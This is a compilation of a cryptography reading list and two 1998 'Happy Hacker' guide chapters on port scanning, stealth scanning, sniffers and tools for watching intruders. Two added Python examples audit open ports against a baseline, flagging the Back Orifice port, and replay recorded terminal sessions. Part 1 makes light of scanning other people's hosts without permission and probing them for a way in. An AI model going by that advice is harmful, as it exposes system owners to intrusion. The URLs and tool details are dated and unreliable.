1. Go to the PGP user's manual that you downloaded with the software and thumb through to about page 81 in the manual for version 5.0, page 77 in version 5.5's manual. That has a great section on crypto stuff. If you're not sure where on your computer it is, go to the directory you put PGP in. Open the folders till you come to one with a bunch of files in it, and there should be a document there with a .pdf extension. That's it.

2. Hit RSA's website at http://www.rsa.com/rsalabs/newfaq/ and download their world famous cryptography FAQ. It's stellar.

3. Let's keep our learning well-rounded: go to Bruce Schneier's Counterpane website for two VERY important essays on understanding what cryptography, privacy and security are all about. They're both downloadable:

"Why Cryptography Is Harder Than It Looks" http://www.counterpane.com/whycrypto.pdf.zip
"Security Pitfalls in Cryptography" http://www.counterpane.com/pitfalls.pdf.zip

B. Books to look for

"Applied Cryptography" Second Edition by Bruce Schneier, John Wiley & Sons, 1996

This is hands-down the best place for you newer crypto people to start really digging in. Bruce wrote this book in plain English (but it has been translated into others too!), explaining everything really clearly. It's sometimes really funny and always easy to read. The book just covers everything. Absolutely everything. The price is a little hefty, but it's a big book and has the source code in C in the back for all you programmers who wanna start tinkering with programming crypto. Check out some more reviews, alternate language versions and other info at Bruce's site http://www.counterpane.com/applied.html

"Handbook of Applied Cryptography" by Alfred Menezes, CRC Press, 1996

This one is a little tougher to find, but it's a really sweet layout of the math and algebra stuff underneath a lot of the secrets that make crypto strong. There's a big treat here, too. It talks about using crypto in places like the banking industry and in alarm systems and all manner of neato environments. It also has a lot of newer information about things happening in the crypto world lately. Look at the info and also a couple of chapters in Acrobat format at: http://www.dms.auburn.edu/hac/

"Decrypted Secrets" by F. L. Bauer, Springer Verlag, 1997

This one is a doozy. This was written from a really technical, but also historical, perspective. Just don't let the columns of numbers and figures freak you out too bad at first.
Some people might have trouble wading through all the math and number theory stuff, but you will be rewarded when you do. There are a ton of stories from history, like spies and wars and stuff since way back when. All of these stories are fascinating to read and are used to make you better understand why the basic rules of using crypto are the way they are. They show this by telling you all the funny ways that crypto people have screwed up in the past, and also by highlighting some of the smarter minds that made the really huge breakthroughs and discoveries.

"Disappearing Cryptography" by Peter Wayner, AP Professional, April 1996

This book is a little trippy. It deals more with some of the high-level privacy philosophy involved, and lays it out in a very interesting, if strange, way. Each section has a real simple description of what it talks about, followed by more technical math descriptions and then a programming example. Good to have, even though it deals more with hiding cryptography (a practice called "steganography") than it does with actual cryptography.

_________________________________________________________

____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 9, Part 1
War Tools! Scan, Sniff, Spoof and Hijack
____________________________________________________________

This Guide is excerpted from the Second Edition of “The Happy Hacker” book, available Sept. 31 1998.

“Hello, I don’t mean to be rude, but I noticed you were examining something, er... proprietary on our system. Would you mind explaining what you were doing?”

Sigh. From time to time I get an email like that. Sometimes it is less polite than this. In this case, I had been examining an intranet server. For some reason it was directly accessible from the Internet instead of being on a private internal network. I’ll bet you can’t reach that box from the Internet any more :) I was just curious, not trying to break in!

The one thing that defines a hacker is curiosity: a blinding, insatiable hunger for more, more, more information. If your objective is to fight those who attack your computers, your curiosity will be your greatest asset. This chapter covers some powerful war tools that can satisfy your curiosity in a legal and constructive way -- and shows how to use them to battle computer criminals.

Sysadmins tell me that it is far harder to keep people out of your computer systems than it is to break in. In this chapter we will get a glimpse of this war between sysadmins and computer intruders, and learn something about the tools they both use.
*******************
In this chapter you will learn about:

IP address scanning
Port scanning
  a beginner’s scanner
  a stealth scanner
How to give intruders a hard time
  Nuke Nabber (for casual users)
  Port Dumper (for anyone with a sense of humor)
  RotoRouter (drive the bad guys nuts)
  Sniffit
  TCPview
  TTY-Watcher (great fun for casual users, great tool for sysadmins)
Industrial strength tools
  Etherpeek
  IP-Watcher
  T-sight
****************

*********************************
You can get punched in the nose warning: Before you start playing with the techniques of this chapter, beware. If you use what you learn here for snooping on other people’s networks, you should expect them to suspect you of being a computer criminal. For this reason, if you want to explore other people’s systems, it helps to make friends with the staff of your ISP so they won’t kick you off for suspicion of computer crime. Also, it helps to get permission from the sysadmins of whatever network you are checking out. If you find a problem, you should notify the responsible sysadmin so he or she may fix the problem.

It also helps to maintain a good reputation. If you are known as a troublemaker, you will get lots of grief for using the tools of this chapter. If you have a good reputation, people will believe it when you say you are exploring in order to learn network administration -- or simply for the pure joy of discovery. If your ISP is one of those big, anonymous places that would kick you off at the least sign of trouble, switch to a local ISP where you can drop in and offer to take the tech support staff out for pizza. Trust me on this, if you try out what this chapter teaches, almost any large ISP will soon give you the boot.
*********************************

*********************************
You can go to jail warning: If you live outside the United States, be sure to check on what the local computer crime laws are. I can’t guarantee the tactics of this chapter will be legal everywhere.
*********************************

IP Address and Port Scanning

Every day someone emails me to complain that some host name in an ancient GTMHH won’t do cool stuff any more. Imagine that! When I wrote those first GTMHHs I was just sending them to a few friends. I assumed these Guides would soon fade out of existence in the vastness of the Internet. Little did I suspect that eventually tens of thousands of newbies would be fingering, telnetting, ftping, phfing and worse into those IP addresses. So of course their sysadmins have buttoned them down. Strangers can’t play with them any more.

What really saddens me is how many people ask me for good host names they can use. It is so easy to find them yourself! If you want to be primitive about it, you can scan for IP addresses by hand. Find a tempting domain name while surfing the web, running traceroute or tracert, or in the headers of email. Then try the techniques of the “Port Surf’s Up!” chapter to see if there is anything interesting there. This is a good way to start, because you know exactly what you are doing and can get a gut feel for the process. Also, it’s quite a rush to discover something rare like the Internet backbone VAX/VMS in the port surfing chapter -- and discover that it is advertising the status of its huge network to you from port 15!

There also are programs that will find live Internet host computers for you automatically. Many of these tools will also map which ports are open. They won’t always give you all the goodies you can get when you port surf by hand, but they find out the basics for you fast.

********************************
You can get punched in the nose warning: The downside of the IP scanner and port scanner tools of this chapter is that when you use them on other people’s computers without permission, this practically shouts “I am a criminal hacker.” Presumably this isn’t true, but way too many sysadmins have discovered that a port scan is soon followed by a break-in attempt.
If you do insist on scanning without permission, it helps to scan Internet hosts owned by other hackers. If people who are obviously hackers complain, the sysadmins at your ISP or company LAN may not have much sympathy for them. Hey, they are hackers, they can take care of themselves. However, if you do this without the hackers’ permission, you just might incite a hacker war against you, which may nevertheless lead to losing your Internet access.
********************************

So we’re ready to scan for Internet hosts and their ports. Let’s start with how newbies can do it. You can get a Windows 95/98 program that scans IP addresses and ports, What’s Up Gold, from http://www.ipswitch.com. It’s free for a one month trial. It’s a simple point and click program that does an excellent job.

Here’s what I get when I scan IP addresses from 198.987.999.1 through 198.987.999.254 looking for any open ports in the range of 1 through 600. This scan is set to check each port by waiting only 100 milliseconds for a response from each one:

198.987.999.033
198.987.999.036 80
198.987.999.044
198.987.999.048
198.987.999.049
198.987.999.066
198.987.999.067
198.987.999.074
198.987.999.080
198.987.999.113
198.987.999.115
198.987.999.118
198.987.999.167

I run the same scan again but with the time-out set to 1 second.
This reveals many more live IP addresses and ports:

198.987.999.033 7 9 11 13 15 19 21 23 25 37 53 79 80 110 111 113 139 143
198.987.999.034 139
198.987.999.035
198.987.999.036 80 139
198.987.999.041
198.987.999.042 139
198.987.999.043 139
198.987.999.044 139
198.987.999.045 139
198.987.999.048 139
198.987.999.049 139
198.987.999.050 80 139
198.987.999.051 21 22 23 25 37 70 79 109 110 111 113 143
198.987.999.055 139
198.987.999.056
198.987.999.058 139
198.987.999.059 139
198.987.999.060
198.987.999.061 139
198.987.999.061 139
198.987.999.065 139
198.987.999.066 21 23 80 139
198.987.999.067
198.987.999.068
198.987.999.069
198.987.999.072
198.987.999.073
198.987.999.074
198.987.999.075
198.987.999.077
198.987.999.078
198.987.999.079
198.987.999.080
198.987.999.082
198.987.999.083
198.987.999.084
198.987.999.085
198.987.999.086
198.987.999.088
198.987.999.092
198.987.999.093
198.987.999.098
198.987.999.099
198.987.999.101
198.987.999.103
198.987.999.105
198.987.999.108
198.987.999.110
198.987.999.111
198.987.999.112
198.987.999.113
198.987.999.115
198.987.999.118
198.987.999.119
198.987.999.120
198.987.999.121
198.987.999.122
198.987.999.123
198.987.999.124
198.987.999.125
198.987.999.126
198.987.999.131
198.987.999.133
198.987.999.136
198.987.999.137
198.987.999.139
198.987.999.146
198.987.999.156 80
198.987.999.158
198.987.999.162 139
198.987.999.163
198.987.999.165
198.987.999.166
198.987.999.167
198.987.999.169 7 9 13
198.987.999.173 13 15 21 23 25 79 513 514 515 540
198.987.999.177
198.987.999.178 135 389
198.987.999.180
198.987.999.182
198.987.999.183
198.987.999.184
198.987.999.186 139
198.987.999.188
198.987.999.189 139
198.987.999.194 139
198.987.999.195 7 9 13 17 19 135 139
198.987.999.198 110 119 139

OK, I admit it, to save space I was trying to accomplish two slightly conflicting things with this particular set of IP addresses. These are (foobarred) dynamically assigned IP addresses of an ISP. These are assigned to dial-up customers.
So some of these addresses will change or the users of the same address may change from one scan to the next. However, these two scans were done only a few minutes apart. So not many of the connections would have changed in this period. These scans show the importance of a long time-out setting in What’s Up. One second (1000 ms) has given me better results.

Here, among these dynamically assigned IP addresses, is where I really get my kicks. Dynamically assigned IP addresses are the Rick’s Cafe -- no, the Star Wars Cantina -- of cyberspace. OK, most of these IP addresses reveal no open ports. They are probably mere dialups for downloading email or surfing the Web for people who wouldn’t know Unix from unicorns. However, since I chose the dynamic IP addresses of an ISP well-known for attracting hackers, this particular set of IP addresses is -- interesting.

Check out “198.987.999.036 80 139”, “198.987.999.050 80 139”, and “198.987.999.156 80”. Those 80s represent ephemeral Web sites, in existence only so long as their dialups last. Wonder what they hold? The fact that almost all other services are turned off suggests sophisticated users. Maybe those Web sites will be passworded, or maybe I can get in...

That “198.987.999.033 7 9 11 13 15 19 21 23 25 37 53 79 80 110 111 113 139 143” must be a Linux or other home Unix type box. It’s run by a real novice, I’d say, judging from all those open ports. Look at that port 21 open. Wonder if he or she has an anonymous ftp server? Better check it out before it winks out of existence. It also has a Web server...

Take a look at “198.987.999.051 21 22 23 25 37 70 79 109 110 111 113 143”. That port 22 -- that means secure shell login. No webserver (80), no echo (7), discard (8), daytime (13), netstat (15) etc. Since these are ports that a cautious sysadmin would disable, these are signs that the box might be owned by a hacker.
If this is a dynamically assigned IP address from an ISP on which you have a shell account, a quick look at netstat and/or the “last” command will probably reveal the user name of this hacker.

Check out “198.987.999.198 110 119 139” and “198.987.999.178 135 389”. Weird selection of ports. Wonder if the owners of those boxes would tell me what they are up to? Hey, there’s a POP server (110). Maybe if I email “root@198.987.999.198” I will get a message through.

Sheesh, I don’t know, I’m just playing around. Hacking. It’s OK to make mistakes and hit dead ends, because real hackers mess around, explore, and try out new things. If things don’t work, it’s no big deal. If they do work, however...

If you have a Unix type computer, there are many other port scanners available. SATAN (Security Analysis Tool for Auditing Networks) is famous, free, and also will often identify ports that are vulnerable to attack. You can get it at ftp://ftp.cs.ruu.nl:/pub/SECURITY/. Possession of the code for SATAN is enough to get you kicked off some ISPs. Check out http://www.rootshell.com for other Unix port scanner programs that may not make people as suspicious of you.

If you are willing to pay lots of money for a port scanner, several computer security companies sell them. Internet Security Systems (ISS) has an exceptionally good one, Internet Scanner (at http://www.iss.net). Like SATAN, Internet Scanner will identify security holes in the ports you scan. There are versions for both Unix and Windows NT systems. Because their software would be dangerous in the wrong hands, ISS will only sell you a version to scan the IP addresses you own or that the company you work for has given you permission to scan.

Stealth Port Scanning

You may have already heard that there are port scanners that are impossible to detect. If true, that would solve the problem of getting kicked off your ISP for running scans. One that I have tried out is Nmap, available for free from http://dhp.com.
It runs on Unix type operating systems, and has options to do both normal port scanning and “stealth” port scanning. Warning -- like What’s Up, Nmap is not always accurate. While What’s Up misses open ports, Nmap often erroneously says closed ports are open.

****************************
Wizard tip: Here’s why Nmap is inaccurate in fin scan (stealth or half-open) mode. It sends to each port on the victim computer a single packet with the fin flag (end of transmission) set. If it gets back a packet with the rst (reset) flag set, it reports the port as closed. If it doesn't get rst back, it reports it as open. Of course a dropped packet can also account for the missing rst. As a result, on a noisy connection Nmap shows many ports as open that aren't. Try fin scanning a nonexistent host with Nmap and you will see all ports reported open. On a theoretical basis, any scanner that sends only a single packet to probe each port is vulnerable to false results.
***************************

There is another problem that afflicts all stealth scanners. They actually can be detected, and the sender identified, if the target network is running the right sniffer software. EtherPeek (discussed in detail below) is one we have tested against Nmap on the Happy Hacker Wargame (see http://www.happyhacker.org for details on how to play our Wargame). We discovered that EtherPeek definitely detects and identifies the user of stealth port scanners.

How to Tell What Ports are Open on your own Computer

It’s a good idea to regularly check what ports are open on your own computer. If you discover a new port -- time to investigate. For example, an open port 31337 is an almost sure sign that your computer has been taken over by the Windows Back Orifice Trojan. (See the “How to Break into Windows 95/98 Computers” chapter for removal instructions.) It is possible to check all your ports with just the tools that are already part of your Windows or Unix operating system.
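The "check your own ports regularly and investigate any new one" advice can be automated. Here is an added Python example (it is not code from the Guide) that parses the Linux netstat -a listing format this chapter walks through next, compares the listeners it finds against a baseline recorded when the box was known-good, and reports anything new, with a note for port 31337. The baseline, the small service-name table and the sample listing are constructed for the demo.

```python
"""Audit the listeners reported by netstat -a against a known-good baseline.

Added example, not code from the Guide: it automates the "check your own
ports regularly, and investigate any new one" advice by parsing the Linux
netstat -a listing format the Guide shows and reporting listeners that were
not present when the baseline was recorded. The baseline, the service-name
table and the sample listing below are constructed for the demo.
"""
import sys

# netstat prints names from /etc/services instead of numbers; a small
# constructed subset is enough to compare names against a numeric baseline.
SERVICE_TO_PORT = {
    "ftp": "21", "ssh": "22", "telnet": "23", "smtp": "25", "www": "80",
    "http": "80", "pop3": "110", "sunrpc": "111", "auth": "113",
    "syslog": "514", "ntalk": "518",
}

# Listeners recorded when the box was known-good (constructed baseline).
BASELINE = {("tcp", "22"), ("tcp", "25"), ("tcp", "80"), ("udp", "514")}

# Ports whose appearance deserves an explicit note.
NOTES = {"31337": "default port of the Back Orifice Trojan"}

# Constructed netstat -a output in the layout shown in this chapter, with one
# listener (tcp 31337) that was never in the baseline.
SAMPLE_NETSTAT = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0    134 fu.ml.org:telnet        pma03.foo66.com:1030    ESTABLISHED
tcp        0      0 *:www                   *:*                     LISTEN
tcp        0      0 fu.ml.org:22            *:*                     LISTEN
tcp        0      0 *:smtp                  *:*                     LISTEN
tcp        0      0 *:31337                 *:*                     LISTEN
udp        0      0 *:syslog                *:*
udp        0      0 *:ntalk                 *:*
raw        0      0 *:1                     *:*
Active UNIX domain sockets (including servers)
unix  1      [ ACC ]    STREAM     LISTENING   207    /dev/log
"""


def port_number(name):
    """Map a service name printed by netstat to its port number (numbers pass through)."""
    return SERVICE_TO_PORT.get(name, name)


def listening_ports(netstat_text):
    """Return {(proto, port)} for every TCP socket in LISTEN and every UDP socket.

    TCP sockets in other states (the ESTABLISHED telnet session above) are
    connections, not listeners, so they are skipped.
    """
    found = set()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] not in ("tcp", "udp"):
            continue
        proto, local = fields[0], fields[3]
        state = fields[5] if len(fields) > 5 else ""
        if proto == "tcp" and state != "LISTEN":
            continue
        found.add((proto, port_number(local.rsplit(":", 1)[-1])))
    return found


def new_listeners(netstat_text, baseline=BASELINE):
    """Listeners absent from the baseline, each with a note, sorted by proto and port."""
    unexpected = listening_ports(netstat_text) - set(baseline)
    return sorted((proto, port, NOTES.get(port, "not in baseline"))
                  for proto, port in unexpected)


if __name__ == "__main__":
    # Pipe real output in ("netstat -a | python audit.py"); otherwise use the sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NETSTAT
    for proto, port, note in new_listeners(text):
        print(f"NEW LISTENER {proto}/{port}: {note}")
```

Run it on the sample and it reports tcp/31337 (with the Back Orifice note) and udp/518 (ntalk, simply not in the baseline); the ESTABLISHED telnet session is ignored because it is a connection, not a listener. Record the baseline once from a clean box and diff against it from a cron job.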
The “netstat -a” command will show all the ports open on your computer. Here’s what I get on a home Linux box:

~ > netstat -a
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0    134 fu.ml.org:telnet        pma03.foo66.com:1030    ESTABLISHED
tcp        0      0 *:www                   *:*                     LISTEN
tcp        0      0 fu.ml.org:22            *:*                     LISTEN
tcp        0      0 *:smtp                  *:*                     LISTEN
tcp        0      0 *:2049                  *:*                     LISTEN
tcp        0      0 *:660                   *:*                     LISTEN
tcp        0      0 *:printer               *:*                     LISTEN
tcp        0      0 *:auth                  *:*                     LISTEN
tcp        0      0 *:finger                *:*                     LISTEN
tcp        0      0 *:imap2                 *:*                     LISTEN
tcp        0      0 *:pop3                  *:*                     LISTEN
tcp        0      0 *:login                 *:*                     LISTEN
tcp        0      0 *:shell                 *:*                     LISTEN
tcp        0      0 *:telnet                *:*                     LISTEN
tcp        0      0 *:ftp                   *:*                     LISTEN
tcp        0      0 *:time                  *:*                     LISTEN
tcp        0      0 *:sunrpc                *:*                     LISTEN
udp        0      0 *:2049                  *:*
udp        0      0 *:657                   *:*
udp        0      0 *:ntalk                 *:*
udp        0      0 *:biff                  *:*
udp        0      0 *:time                  *:*
udp        0      0 *:syslog                *:*
udp        0      0 *:sunrpc                *:*
raw        0      0 *:1                     *:*
Active UNIX domain sockets (including servers)
Proto RefCnt Flags      Type       State       I-Node Path
unix  2      [ ]        STREAM                 3870   /dev/log
unix  2      [ ]        STREAM     CONNECTED   3869
unix  2      [ ]        STREAM                 475    /dev/log
unix  2      [ ]        STREAM     CONNECTED   474
unix  2      [ ]        STREAM                 434    /dev/log
unix  2      [ ]        STREAM     CONNECTED   433
unix  2      [ ]        STREAM                 281    /dev/log
unix  2      [ ]        STREAM     CONNECTED   280
unix  2      [ ]        STREAM                 257    /dev/log
unix  2      [ ]        STREAM     CONNECTED   252
unix  1      [ ACC ]    STREAM     LISTENING   247    /dev/printer
unix  2      [ ]        STREAM                 246    /dev/log
unix  1      [ ACC ]    STREAM     LISTENING   207    /dev/log
unix  2      [ ]        STREAM     CONNECTED   198

How about seeing what ports are open on your Windows computer? If you are not on a LAN, chances are there won’t be much to see.
Here’s what my stand alone Win98 computer (her name is Lovely_Lady) says when I am on America Online:

C:\WINDOWS>netstat -a

Active Connections

  Proto  Local Address           Foreign Address        State
  TCP    lovely-lady:137         LOVELY_LADY:0          LISTENING
  TCP    lovely-lady:138         LOVELY_LADY:0          LISTENING
  TCP    lovely-lady:nbsession   LOVELY_LADY:0          LISTENING
  UDP    lovely-lady:nbname      *:*
  UDP    lovely-lady:nbdatagram  *:*

How to Give Computer Criminals a Hard Time

Now -- are you ready for war? First, you need to know whether an intruder is on your system. How to do that is worth at least another entire chapter that I haven’t written yet. However, there are some hints for sysadmins I can give you on the basis of first hand experience from our Happy Hacker Wargame. Don’t expect this to be more than a tiny bit of all you should be doing to detect intruders, however.

· Look for unusual traffic patterns -- for example, many ftp sessions, or a user who hasn’t logged into a shell account for months suddenly spending hours at a time logged in.
· A new user name and account that no one remembers creating.
· Watch the processes. A skilled hacker may replace the “ps” command with a Trojan that hides his or her activities. However, you might see a high CPU utilization when the processes running couldn’t account for it. Time to go red alert!
· Check whether system configurations have changed, for example new ports open. Or if your policy is to automatically kill all processes when a user logs off (most ISPs do this), perhaps you will discover processes left running after logoff.
· Look for an Ethernet card on your local area network that is in promiscuous mode (meaning it is accepting all packets broadcast on the network). That probably means an intruder is sniffing your network with a program hidden on the computer with the promiscuous mode card.
· Look for suspiciously large files turning up. They may be secret sniffer logs.
· Do you notice a hacked Web page or obscene Message of the Day -- OK, this suggestion is lame, you knew those signs of hacker attack already!

Of course it’s far better to detect your attacker before he gets inside. Signs that someone is trying to break in are basically activities that we all like to do such as port scans and telnet connections to unusual ports.

Coming up in Part II: both free and commercial programs that help you fight intruders!

# # #

Guess what? “The Happy Hacker Book” has almost sold out its First Edition, published March 31, 1998. So American Eagle Publications is putting out a Second Edition, due to come off the presses Sept. 31, 1998. It has several all-new chapters as well as updates to cover Windows 98 and the major changes that are happening in email forging and spam fighting.

How’s that -- only six months between editions? This is partly because people were so quick to buy out the First Edition -- and partly because the hacking scene is changing so fast. So instead of going to a second printing, the publisher agreed to spend the extra money to create a Second Edition so we could keep you as up to date as possible.

If you want to buy one of the few remaining copies of the First Edition of “The Happy Hacker” (soon to be a collector’s item), you can order it from me ($34.95 for Priority mail shipping in the US; $35.95 airmail in Canada and Mexico; email me for quotes outside the US) by sending a check or money order to PO Box 1520, Cedar Crest NM 87008. Since I only have 18 copies left today, if your order comes in too late, be sure to tell me whether I should just return your money or if you want me to hold on to it and be among the first to get a Second Edition. Oh, yes, I autograph all books bought directly from me.

_______________________________________________________________________
Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org.
We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don’t email us about any crimes you have committed! And don’t expect us to come to your rescue if you crash 100 million computers with some new Java virus you just unleashed.

To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message.

Copyright 1998 Carolyn Meinel. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
_______________________________________________________________________

____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 3 No. 9, Part 2
War Tools! Scan, Sniff, Spoof and Hijack
____________________________________________________________

Note: This Guide is excerpted from the upcoming Second Edition of “The Happy Hacker” book, available Sept. 31, 1998.

So now that we know it’s time to fight intruders, let’s start with free anti-crime tools that are great not only for sysadmins, but also for casual users who just want to have fun.

Twinsen (hacker handle) has written Port Dumper, which is a good program for Unix type computers which will deal with snoopers like me. He says “I use this to play with my friends. This program is used to listen to a port (any port), after it is connected with others, you can type something and Port Dumper will send it. It is quite useful when you want to fake a service, such as http, smtp, etc... or even telnet (Evil Genius Tips: You know it!) It is in my homepage, Channel X Security Information (http://home.netvigator.com/~jcatchan/). I may write a guide on using it to do a specified mission (such as faking as an http server...) later. Hope you'll enjoy using it! Use at your own risk..
I’m not responsible for the use of this stupid shell script....”

Richard Thomas (Humble) has written RotoRouter, “a program for logging and faking the standard Unix udp-based traceroute... . When someone is about to do a DOS (denial of service attack), it is commonplace for them to traceroute to the target, launch the attack, and traceroute again to see the effect..., secure in the belief that their traceroute will never be noticed. They commonly trace from their home machines (99% of packet warriors have 28.8k modems and bandwidth envy, right :P), or ... from the hacked machine they are attacking with.”

RotoRouter is a great way to fake out those losers who think attacking other people’s networks is fun. It sends fake Time Exceeded and Destination Unreachable messages. In Humble’s words, other ways his program can fake out people include:

· Lead those stupid smurf kiddies away from your vulnerable routers
· Lie to customers about your bandwidth...
· Scare your ... friends with odd routes, watch their heads explode
· Make the final hop reverse to "this.traceroute.has.been.logged.com"

However, to run RotoRouter, you must install it on a Unix type computer -- as root. This is another reason to run Linux on your home computer. If you have what it takes to run RotoRouter and want to fake out people and fool attackers, you can get it at http://www.bitchx.com/~humble/.

If you really want to have fun, and if you suspect someone has broken into your system, there is a free program for Unix computers called TTY-Watcher. It is available from http://www.engarde.com. TTY-Watcher lets you see exactly what anyone is typing on their keyboard while they are logged on to your computer. You can even record their keystrokes and play them back at the same speed the intruder typed them -- or play them back faster, if that d00d is a slow typist. You can also download a free trial of the more advanced Windows version of this program, T-sight, from the En Garde Systems web site.
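The record-and-replay idea behind TTY-Watcher is easy to reproduce with tools every Unix box already has. Here is an added Python example, not code from the Guide and not part of TTY-Watcher, that replays a session recorded by the standard `script` utility (`script -t 2>timing typescript`): the typescript holds the raw bytes the terminal showed, and the timing file has one line per write giving the seconds since the previous write and the byte count. The replayer plays at the original speed or any multiple of it and can cap long idle gaps. The recorded session below is constructed for the demo.

```python
"""Replay a recorded terminal session at its original speed or faster.

Added example, not code from the Guide and not part of TTY-Watcher. It reads
the two files produced by the Unix `script` utility when run as
`script -t 2>timing typescript`: the typescript holds the raw bytes the
terminal showed, and the timing file has one line per write, "<seconds since
the previous write> <byte count>". The session below is constructed.
"""
import sys
import time

# Constructed recording of an unprivileged user looking around, then probing sudo.
TYPESCRIPT = (
    b"Script started on Sat Jun  6 21:14:03 1998\n"   # banner written by script itself
    b"$ id\nuid=1001(guest) gid=1001(guest)\n"
    b"$ sudo -l\n[sudo] password for guest: \n"
    b"Script done on Sat Jun  6 21:14:41 1998\n"
)
# Five writes of 5, 32, 10, 28 and 40 bytes, each preceded by its idle time.
TIMING = "0.05 5\n0.10 32\n6.50 10\n0.90 28\n25.00 40\n"


def load_session(typescript, timing):
    """Pair every timing entry with the bytes it covers -> [(delay_s, chunk)].

    The first line of the typescript is script's own banner; scriptreplay skips
    it too, so timing entries apply to the bytes after that line.
    """
    pos = typescript.index(b"\n") + 1
    session = []
    for lineno, line in enumerate(timing.splitlines(), 1):
        if not line.strip():
            continue
        delay_text, count_text = line.split()
        delay, count = float(delay_text), int(count_text)
        chunk = typescript[pos:pos + count]
        if len(chunk) != count:
            raise ValueError(f"timing line {lineno}: typescript ends before the {count} bytes it describes")
        session.append((delay, chunk))
        pos += count
    return session


def schedule(session, divisor=1.0, max_delay=None):
    """Turn recorded delays into sleeps: divided by `divisor` (2.0 = twice as fast)
    and, if `max_delay` is given, capped so long idle gaps do not stall the replay."""
    plan = []
    for delay, chunk in session:
        wait = delay / divisor
        if max_delay is not None:
            wait = min(wait, max_delay)
        plan.append((wait, chunk))
    return plan


def total_duration(session, divisor=1.0, max_delay=None):
    """Seconds a replay with these settings will take."""
    return sum(wait for wait, _ in schedule(session, divisor, max_delay))


def replay(session, divisor=1.0, max_delay=None, out=None):
    """Write the session to `out` (default: this terminal) with the scheduled pauses."""
    out = out or sys.stdout.buffer
    for wait, chunk in schedule(session, divisor, max_delay):
        time.sleep(wait)
        out.write(chunk)
        out.flush()


if __name__ == "__main__":
    # Usage: python replay.py [divisor]; 1 = the intruder's own speed, 10 = ten times faster.
    speed = float(sys.argv[1]) if len(sys.argv) > 1 else 10.0
    session = load_session(TYPESCRIPT, TIMING)
    print(f"replaying {len(session)} writes, {total_duration(session, speed):.2f}s at {speed:g}x")
    replay(session, divisor=speed, max_delay=2.0)
```

Keeping the timing file is what makes a recording evidence rather than just a transcript: the 6.5 second pause before `sudo -l` and the 25 seconds of silence at the end survive the replay, and a truncated typescript is rejected rather than silently misaligned against its timing.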
I’ve seen some playbacks. They make fabulous party entertainment. On one, someone had broken into a computer at Los Alamos Laboratories that actually was a “bait” computer used to practice fighting computer criminals -- using real unsuspecting computer criminals. This particular criminal was trying to send email from this computer bragging of his (hah, hah) feat and demanding that Kevin Mitnick be released from prison. What was fascinating was that Mr. Computer Criminal kept on entering MS-DOS commands on the hacked computer, which didn’t work because it was running Unix. After about 20 tries he finally managed to send out his email boast. Then he tried to destroy the evidence of his crime by erasing the entire hard disk. However, he found this hard to do. He kept on giving various erase commands, then listing the directories, and the stuff didn’t seem to be disappearing. You could almost feel his rising panic.

TTY-Watcher is ideal for when you and your friends are playing hacker wargames where the attacker starts from a shell account on the victim computer. By seeing exactly what other people are doing to leverage unprivileged shell access into root access, you can learn a lot about how to detect and fight attacks. You can also better understand why it is so hard nowadays to get a shell account on an ISP.

TTY-Watcher is outstandingly good at one thing: it allows you to control your victim intruder. I watched this happen once on a friendly hacker wargame. The guy running TTY-Watcher felt sorry for the other player, took over the poor guy’s session and fixed his commands. If your intruder is hostile, and you wanted to mess up his commands instead, you could make his day profoundly bad.

The only weakness of TTY-Watcher is that it only runs on one machine. It isn’t set up to defend an entire network. If you just need a free program to watch what is flowing on your local Ethernet, try Sniffit, available for free from http://www.rootshell.com.
It’s boring compared to some of the above programs, but valuable for more sophisticated users who need to understand the technical details of how an intruder got in. Its description, “A very flexible network sniffer that has many interesting features (like curses)” suggests that it may be used by your intruders to sniff your network. Computer criminals love Sniffit. If you can become intimately familiar with its features, it will be easier for you to find a hidden Sniffit in operation.

Another program for watching criminals at work on Windows computers is TCPview. It is available for free from http://www.sysinternals.com/. It is a GUI (graphical user interface) utility that tells you at any time what connections are open to your box, and what is going on with each connection.

If you are brave, or perhaps foolhardy, you could always try running Back Orifice on your Windows computer. The promotional material for this free program makes it sound useful for being able to keep your computer out of trouble when you are away from it by logging into it from the Internet. However, it is quite difficult to uninstall Back Orifice. Also, it was written by a member of the Cult of the Dead Cow, a gang notorious for an excessive sense of humor. Many computer security experts warn that Back Orifice is a Trojan that will make it easy for strangers to get into your computer. I don’t recommend ever installing Back Orifice. If you have installed it and want to get rid of it, removal instructions are in the chapter “How to Break into Windows 95/98 Computers.”

Suppose you want to see whether someone is port scanning you or trying to break into a port. One useful utility is Nukenabber, available from http://www.winfiles.com, in the Winsock area. It watches up to 50 ports simultaneously. Yes, it is a Windows program, and it’s free.

Industrial Strength War Programs

Now -- let’s say you are responsible for a large LAN or an entire ISP.
Especially if you are responsible for a commercial Web site, this is a job that calls for much more than the programs above can do. According to an International Computer Security Association report of April, 1997, about half of US Web sites are attacked or probed each month. True, most of these are probes from the clueless, but even the clueless get lucky sometimes. You may well need security products that can handle a broad spectrum of computer crime problems, that work across a network, and that can spot the most sophisticated attacks. Most important, you need the power to fight back.

Since I don’t like to take a company’s word for the quality of their security products, I will only discuss the two that I have tested: EtherPeek 3.5 for MacOS, from AG Group at http://www.aggroup.com; and IP-Watcher for Unix from En Garde Systems, http://www.engarde.com. I picked those two because they promised exceptional powers to detect attack, and in the case of IP-Watcher, to fight back when under attack. EtherPeek in particular also gets high recommendations from sysadmins I know at the AGIS Internet backbone, and Rt66 Internet, the largest ISP in New Mexico. Both AGIS and Rt66 have had more than their share of attacks by computer criminals, so they have had real life experience with EtherPeek. Another plus for EtherPeek and IP-Watcher is that they are both ideal for testing other security products such as firewalls, router packet filters, and wrappers, and to track down and gather the evidence needed to put computer criminals behind bars.

